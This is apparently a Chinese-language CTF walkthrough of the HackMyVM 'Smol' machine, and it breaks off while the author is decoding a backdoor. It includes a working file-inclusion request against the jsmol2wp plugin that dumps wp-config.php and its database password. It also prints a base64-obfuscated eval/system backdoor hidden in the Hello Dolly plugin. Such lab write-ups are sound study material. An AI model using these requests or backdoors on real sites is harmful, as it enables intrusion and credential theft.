hmv[-_-]Smol

Smol

image-20250607094448803

image-20250607095831139

信息搜集

端口扫描

┌──(kali💀kali)-[~/temp/Smol]
└─$ rustscan -a $IP -- -sCV            
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'

Open 192.168.10.100:22
Open 192.168.10.100:80

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+/gIThU4ODr/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF/gS3jP/fVw+H6Eyz/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL/iO8JI5DrcvPDFlmqtX/lzemir7W+WegC7hpoYpkPES6q+0/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=
|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://www.smol.hmv
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现了一个域名解析,添加一下:

192.168.10.100    www.smol.hmv

目录扫描

┌──(kali💀kali)-[~/temp/Smol]
└─$ feroxbuster  -u http://smol.hmv -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php txt html -s 200 301 302 -d 1

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://smol.hmv
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 301, 302]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt, html]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 1
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301      GET        0l        0w        0c http://smol.hmv/ => http://www.smol.hmv/
301      GET        0l        0w        0c http://smol.hmv/index.php => http://www.smol.hmv/
301      GET        9l       28w      309c http://smol.hmv/wp-content => http://smol.hmv/wp-content/
200      GET       81l      274w     4537c http://smol.hmv/wp-login.php
200      GET      384l     3177w    19903c http://smol.hmv/license.txt
301      GET        9l       28w      310c http://smol.hmv/wp-includes => http://smol.hmv/wp-includes/
200      GET      394l      768w     6125c http://smol.hmv/wp-admin/css/install.css
200      GET       13l       78w     4373c http://smol.hmv/wp-admin/images/wordpress-logo.png
200      GET       23l       81w     1259c http://smol.hmv/wp-admin/upgrade.php
302      GET        0l        0w        0c http://smol.hmv/wp-admin/ => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2F&reauth=1
302      GET        0l        0w        0c http://smol.hmv/wp-admin/import.php => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fimport.php&reauth=1
302      GET        0l        0w        0c http://smol.hmv/wp-admin/update-core.php => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fupdate-core.php&reauth=1
200      GET       17l       82w     1261c http://smol.hmv/wp-admin/install.php
200      GET       98l      836w     7425c http://smol.hmv/readme.html
200      GET        5l       15w      135c http://smol.hmv/wp-trackback.php
301      GET        9l       28w      307c http://smol.hmv/wp-admin => http://smol.hmv/wp-admin/
302      GET        0l        0w        0c http://smol.hmv/wp-signup.php => http://www.smol.hmv/wp-login.php?action=register
[#######>------------] - 3m    319651/882248  5m      found:17      errors:0      
[####################] - 8m    882248/882248  0s      found:17      errors:0      
[####################] - 8m    882184/882184  1953/s  http://smol.hmv/

博客扫描

看上去是一个wordpress,尝试进行扫描:

┌──(kali💀kali)-[~/temp/Smol]
└─$ cmseek -u http://www.smol.hmv -v

[i] Updating CMSeeK result index...
[*] Report index updated successfully!

 ___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA

 [+]  CMS Detection And Deep Scan  [+] 

[i] Scanning Site: http://www.smol.hmv
[+] User Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0
[+] Collecting Headers and Page Source for Analysis
[+] Detection Started
[+] Using headers to detect CMS (Stage 1 of 4)
[*] CMS Detected, CMS ID: wp, Detection method: header
[+] Getting CMS info from database
[+] Starting WordPress DeepScan
[+] Detecting Version and vulnerabilities
[+] Generator Tag Available... Trying version detection using generator meta tag
[*] Version Detected, WordPress Version 6.8.1
[+] Initiating open directory and files check
[+] XML-RPC interface not available
[+] Looking for potential path disclosure
[i] Checking user registration status
[i] Starting passive plugin enumeration
[*] 1 Plugin enumerated!
[i] Starting passive theme enumeration
[+] Looking for theme zip file!
[*] 1 theme detected!
[i] Starting Username Harvest
[i] Harvesting usernames from wp-json api
[!] Json api method failed trying with next
[i] Harvesting usernames from jetpack public api
[!] No results from jetpack api... maybe the site doesn't use jetpack
[i] Harvesting usernames from wordpress author Parameter
[*] Found user from source code: xavi
[*] Found user from source code: diego
[*] Found user from source code: gege
[*] Found user from redirection: admin
[*] Found user from redirection: think
[*] Found user from redirection: wp
[*] 6 Usernames were enumerated
[i] Checking version vulnerabilities using wpvulns.com
[x] Error Retriving data from wpvulndb
___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA

 [+]  Deep Scan Results  [+] 

 ┏━Target: www.smol.hmv
 ┃
 ┠── CMS: WordPress
 ┃    │
 ┃    ├── Version: 6.8.1
 ┃    ╰── URL: https://wordpress.org
 ┃
 ┠──[WordPress Deepscan]
 ┃    │
 ┃    ├── Readme file found: http://www.smol.hmv/readme.html
 ┃    ├── License file: http://www.smol.hmv/license.txt
 ┃    ├── Uploads directory has listing enabled: http://www.smol.hmv/wp-content/uploads
 ┃    │
 ┃    ├── Plugins Enumerated: 1
 ┃    │    │
 ┃    │    ╰── Plugin: jsmol2wp
 ┃    │        │
 ┃    │        ├── Version: 14.1.7
 ┃    │        ╰── URL: http://www.smol.hmv/wp-content/plugins/jsmol2wp
 ┃    │
 ┃    │
 ┃    ├── Themes Enumerated: 1
 ┃    │    │
 ┃    │    ╰── Theme: popularfx
 ┃    │        │
 ┃    │        ├── Version: 1.2.5
 ┃    │        ╰── URL: http://www.smol.hmv/wp-content/themes/popularfx
 ┃    │
 ┃    │
 ┃    ├── Usernames harvested: 6
 ┃    │    │
 ┃    │    ├── wp
 ┃    │    ├── think
 ┃    │    ├── diego
 ┃    │    ├── gege
 ┃    │    ├── xavi
 ┃    │    ╰── admin
 ┃    │
 ┃
 ┠── Result: /home/kali/temp/Smol/Result/www.smol.hmv/cms.json
 ┃
 ┗━Scan Completed in 0.88 Seconds, using 45 Requests

 CMSeeK says ~ addio

漏洞发现

信息搜集

发现了若干用户以及一个插件jsmol2wp,简单看一下发现不存在相关漏洞,使用wpscan扫描一下:

┌──(kali💀kali)-[~/temp/Smol]
└─$ wpscan --url http://www.smol.hmv --api-token xxxxxxxxxxxxxxxxxxx
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://www.smol.hmv/ [192.168.10.100]
[+] Started: Fri Jun  6 22:30:50 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://www.smol.hmv/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://www.smol.hmv/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://www.smol.hmv/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://www.smol.hmv/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:03 <============================================================================================================> (702 / 702) 100.00% Time: 00:00:03[i] The WordPress version could not be detected.

[+] WordPress theme in use: popularfx
 | Location: http://www.smol.hmv/wp-content/themes/popularfx/
 | Last Updated: 2024-11-19T00:00:00.000Z
 | Readme: http://www.smol.hmv/wp-content/themes/popularfx/readme.txt
 | [!] The version is out of date, the latest version is 1.2.6
 | Style URL: http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5
 | Style Name: PopularFX
 | Style URI: https://popularfx.com
 | Description: Lightweight theme to make beautiful websites with Pagelayer. Includes 100s of pre-made templates to ...
 | Author: Pagelayer
 | Author URI: https://pagelayer.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5, Match: 'Version: 1.2.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 0
 | Requests Remaining: 23

[+] Finished: Fri Jun  6 22:30:58 2025
[+] Requests Done: 706
[+] Cached Requests: 609
[+] Data Sent: 191.137 KB
[+] Data Received: 179.346 KB
[+] Memory used: 248.938 MB
[+] Elapsed time: 00:00:07

Scan Aborted: wrong constant name 

            version_finder_module.const_set(constant_name, Module.new)
                                 ^^^^^^^^^^
Trace: /usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:70:in `const_set'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:70:in `maybe_create_module'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:83:in `create_versions_finders'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/finders/plugin_version.rb:23:in `create_and_load_dynamic_versions_finders'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/finders/plugin_version.rb:16:in `initialize'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/finders/independent_finder.rb:12:in `new'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/finders/independent_finder.rb:12:in `find'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/models/plugin.rb:34:in `version'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration/enum_methods.rb:79:in `each'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration/enum_methods.rb:79:in `enum_plugins'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration.rb:13:in `run'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:50:in `each'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:50:in `block in run'
/usr/lib/ruby/3.1.0/timeout.rb:84:in `timeout'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:45:in `run'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/scan.rb:24:in `run'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:17:in `block in <top (required)>'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/scan.rb:15:in `initialize'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:6:in `new'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:6:in `<top (required)>'
/usr/bin/wpscan:25:in `load'
/usr/bin/wpscan:25:in `<main>'

报错处理

出现了奇怪的报错,但是我不知道这个报错该咋解决,尝试升级一下:

┌──(kali💀kali)-[~/temp/Smol]
└─$ sudo apt-get update && sudo apt-get upgrade
# sudo apt autoremove

但是升级完以后出现了新的报错:

┌──(kali💀kali)-[~/temp/Smol]
└─$ wpscan             
/usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1421:in `block in activate_dependencies': Could not find 'opt_parse_validator' (~> 1.9.5) among 159 total gem(s) (Gem::MissingSpecError)
Checked in 'GEM_PATH=/home/kali/.local/share/gem/ruby/3.1.0:/var/lib/gems/3.1.0:/usr/local/lib/ruby/gems/3.1.0:/usr/lib/ruby/gems/3.1.0:/usr/lib/x86_64-linux-gnu/ruby/gems/3.1.0:/usr/share/rubygems-integration/3.1.0:/usr/share/rubygems-integration/all:/usr/lib/x86_64-linux-gnu/rubygems-integration/3.1.0' at: /usr/share/rubygems-integration/all/specifications/cms_scanner-0.13.9.gemspec, execute `gem env` for more information
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `each'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `activate_dependencies'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1389:in `activate'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1423:in `block in activate_dependencies'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `each'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `activate_dependencies'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1389:in `activate'
        from /usr/lib/ruby/vendor_ruby/rubygems.rb:290:in `block in activate_bin_path'
        from /usr/lib/ruby/vendor_ruby/rubygems.rb:289:in `synchronize'
        from /usr/lib/ruby/vendor_ruby/rubygems.rb:289:in `activate_bin_path'
        from /usr/bin/wpscan:25:in `<main>'

尝试解决,在github发现了一个大佬的解决方案:

https://github.com/wpscanteam/wpscan/issues/1243#issuecomment-489421054

Resolved the same issue. In my fix, I did NOT uninstall anything.

apt-get install ruby-dev
gem install ffi --platform=ruby
gem install yajl-ruby
apt-get install libxslt-dev libxml2-dev
gem install nokogiri -- --use-system-libraries

Then wpscan worked.

但是并未完全解决,不慌,回头换个kali

插件漏洞利用

尝试google一下插件的相关漏洞,先看一下版本吧:

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/wp-content/plugins/jsmol2wp/ | html2text
****** Index of /wp-content/plugins/jsmol2wp ******
[[ICO]]       Name                  Last_modified    Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory                         -  
[[   ]]       JSmol.min.js          2023-08-16 20:24 224K  
[[   ]]       JSmol.min.nojq.js     2023-08-16 20:24 129K  
[[   ]]       add-textdomain.php    2023-08-16 20:24 4.6K  
[[   ]]       class.jsMol2wp.php    2023-08-16 20:24 9.8K  
[[DIR]]       css/                  2023-08-16 20:22    -  
[[TXT]]       help.htm              2023-08-16 20:24 9.0K  
[[DIR]]       idioma/               2023-08-16 20:22    -  
[[DIR]]       images/               2023-08-16 20:22    -  
[[DIR]]       j2s/                  2023-08-16 20:22    -  
[[   ]]       jsmol2wp.php          2023-08-16 20:24 2.4K  
[[TXT]]       jsmol_template.htm    2023-08-16 20:24 2.0K  
[[DIR]]       php/                  2023-08-16 20:22    -  
[[TXT]]       readme.txt            2023-08-16 20:24 5.2K  
[[TXT]]       simple.htm            2023-08-16 20:24 6.3K  
[[TXT]]       updating_jsmol2wp.txt 2023-08-16 20:24  475  
===========================================================================
     Apache/2.4.41 (Ubuntu) Server at www.smol.hmv Port 80

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt | html2text
=== JSmol2WP === Contributors: Jim Hu Tags: shortcodes, JSmol, Jmol, molecular
graphics, PDB Requires at least: 3.0 Tested up to: 4.9.4 Donate link:http://
biochemistry.tamu.edu/index.php/alum/giving/ Stable tag: 1.07 License: GPLv2 or
later License URI: http://www.gnu.org/licenses/gpl-2.0.html Text domain:
jsmol2wp Domain path:/languages/ Plugin to place JSmol molecular graphics
applets in WordPress posts or pages. == Description == This shortcode plugin
places JSmol applets in WordPress posts and pages. Use [jsmol pdb='accession']
for a minimal version. jsmol2wp will look to see if a pdb file has been
uploaded to your wordpress and it will use that file if it can find it. If it
can't find a matching post for an uploaded attachement, it will try http://
rcsb.org/pdb. If it can't find a match there either, you'll get an error
message in the JSmol window. Additional information on optional parameters are
at the About/Help link in the applets. This plugin was developed for use on the
website for the Department of Biochemistry and Biophysics at Texas A&M
University (http://biochemistry.tamu.edu). == Installation == Place in the
plugins directory and activate. No additional files or configurations are
needed. Thanks to Bob Hanson and the JMol team for making the javascript code
for jsmol available. See: http://chemapps.stolaf.edu/jmol/jsmol http://
wiki.jmol.org/index.php/Jmol_JavaScript_Object This plugin also benefited from
using Jaime Prilusky's mediawiki extension for inspiration http://
proteopedia.org/support/JSmolExtension/ == Upgrade Notice == Version 1.03
updates the Jmol libraries and fixes a bug with the load parameter ==
Frequently Asked Questions == = Is there an example of an installation? = See
http://jimhu.org/jsmol2wp-plugin-released-at-wordpress-org/ = Where can I learn
more about what JSmol can do? = Jmol documentation can be found at http://
jmol.sourceforge.net/#Learn%20to%20use%20Jmol and http://jmol.sourceforge.net/
docs/JmolUserGuide/ == Screenshots == 1. Applet for a protein. 2. Applet for a
small molecule. == Changelog == = 1.07 = fix extremely stupid svn error where
needed files from the j2s directory were not in the repo = 1.06 = change rcsb
file path to avoid redirect = 1.05 = load rcsb pdb files via https instead of
http = 1.04 = * updated jsmol package from Jmol sourceforge * first attempt at
internationalization ** Added idioma directory from jsMol distributions **
Added set language directive based on wordpress get_locale() = 1.03 = * updated
jsmol package from Jmol sourceforge * Remove beta from help.htm * fix bug where
load param was not working = 1.02 = * fixes to this readme.txt file to improve
the display at the wordpress.org plugin repository = 1.01 = * tweaks for
wordpress.org deposition = 1.0 = * update JSmol code to 14.3.12_2015.01.28 *
prepare for release to wordpress.org plugin repository = 0.94 beta = * add
isosurface support * rewrite the code to set up structure loading * replace WP
get_page_by_title with a function that matches the filename * add jvxl to file
types * fixed bug where caption nonmatching required casting match as a string.
* move the help demo page to a more stable URL. = 0.93 beta = * set default
type based on fileurl extension if present * fix bug where reset button failed
with data from fileurl = 0.92 beta = * change appletID to not require $acc. =
0.9 beta = * improve help page * improve uniqueness identifiers for multiple
Jmolapplets on the same post/page; add the option to hand code instances *
improve debug messages (or at least change them) * make reset button standard
and have it remember the load commands * standard buttons depend on the type of
molecule loaded. * add some semicolons to the template to try to fix lint
warnings: http://www.javascriptlint.com/online_lint.php = 0.8 beta = * removed
data directory * changed system for counting instances of the shorttag so we
don't need preg_match * removed whitespace from template hoping that solves the
problem of themes adding markup * simplified load script as suggested by Bob
Hansen * made applet IDs more unique by appending post id = 0.7 beta = * update
jsmol libraries to 4.1.7_2014.06.09 * add dependencies for jquery-ui-core and
jquery-ui-menu fixes popup problem in some themes * refactor to support
additional file types (in progress) * fix multiline regex bug * fix bug that
caused failure to load when permalinks used ?p=post_number format * debug
constructor * debug view ..* add path to uploaded file ..* add test for
get_page_by_title = 0.6 alpha = * register script before enqueueing it. * added
ability to add Jmol.script commands * added the ability to add jmolCommandInput
= 0.5 alpha = * added wrap and debug options = 0.4 alpha = * changed to nojq. *
modified command processing to not split on allowed characters in Jmol syntax.
= 0.3 alpha = * changed default to spin off in order to save client cpu *
custom command buttons working. = 0.2 alpha = * changed system to use a
template based on the distro file simple1.htm. * added captioning * works with
local or remote pdb files from rcsb.org/pdb = 0.1 pre-alpha = * basic shortcode
working with uploaded pdb file * adds .pdb chemical/pdb mime type to allowed
mime types * handles multiple shortcodes on the same page

版本为1.07,进行查询

image-20250607105707878

发现存在一个文件包含漏洞,尝试查看进行利用:

{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

发现查到了:

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/documentation/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

并包含用户凭证的泄露:

wpuser
kbLSF2Vop#lw3rjDZ629*Z%G

尝试进行登录,默认登录界面为http://www.smol.hmv/wp-admin

image-20250607110621178

登录成功!然后找到了一些有效信息:

# Webmaster Tasks!! — Private

1- [IMPORTANT] Check Backdoors: Verify the SOURCE CODE of "Hello Dolly" plugin as the site's code revision.

2- Set Up HTTPS: Configure an SSL certificate to enable HTTPS and encrypt data transmission.

3- Update Software: Regularly update your CMS, plugins, and themes to patch vulnerabilities.

4- Strong Passwords: Enforce strong passwords for users and administrators.

5- Input Validation: Validate and sanitize user inputs to prevent attacks like SQL injection and XSS.

6- [IMPORTANT] Firewall Installation: Install a web application firewall (WAF) to filter incoming traffic.

7- Backup Strategy: Set up regular backups of your website and databases.

8- [IMPORTANT] User Permissions: Assign minimum necessary permissions to users based on roles.

9- Content Security Policy: Implement a CSP to control resource loading and prevent malicious scripts.

10- Secure File Uploads: Validate file types, use secure upload directories, and restrict execution permissions.

11- Regular Security Audits: Conduct routine security assessments, vulnerability scans, and penetration tests.

显示Hello Dolly插件似乎存在一些漏洞利用,看一下源代码:

image-20250607111244700

image-20250607111313460

发现文件名称为hello.php,利用文件包含漏洞查询一下这个文件的源码:

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php" 
<?php
/**
 * @package Hello_Dolly
 * @version 1.7.2
 */
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/

function hello_dolly_get_lyric() {
        /** These are the lyrics to Hello Dolly */
        $lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, take her wrap, fellas
Dolly, never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, golly, gee, fellas
Have a little faith in me, fellas
Dolly, never go away
Promise, you'll never go away
Dolly'll never go away again";

        // Here we split it into lines.
        $lyrics = explode( "\n", $lyrics );

        // And then randomly choose a line.
        return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}

// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
        eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));

        $chosen = hello_dolly_get_lyric();
        $lang   = '';
        if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
                $lang = ' lang="en"';
        }

        printf(
                '<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
                __( 'Quote from Hello Dolly song, by Jerry Herman:' ),
                $lang,
                $chosen
        );
}

// Now we set that function up to execute when the admin_notices action is called.
add_action( 'admin_notices', 'hello_dolly' );

// We need some CSS to position the paragraph.
function dolly_css() {
        echo "
        <style type='text/css'>
        #dolly {
                float: right;
                padding: 5px 10px;
                margin: 0;
                font-size: 12px;
                line-height: 1.6666;
        }
        .rtl #dolly {
                float: left;
        }
        .block-editor-page #dolly {
                display: none;
        }
        @media screen and (max-width: 782px) {
                #dolly,
                .rtl #dolly {
                        float: none;
                        padding-left: 0;
                        padding-right: 0;
                }
        }
        </style>
        ";
}

add_action( 'admin_head', 'dolly_css' );

解密一下这个base64字符串:

┌──(kali💀kali)-[~/temp/Smol]
└─$ echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA" | base64 -d

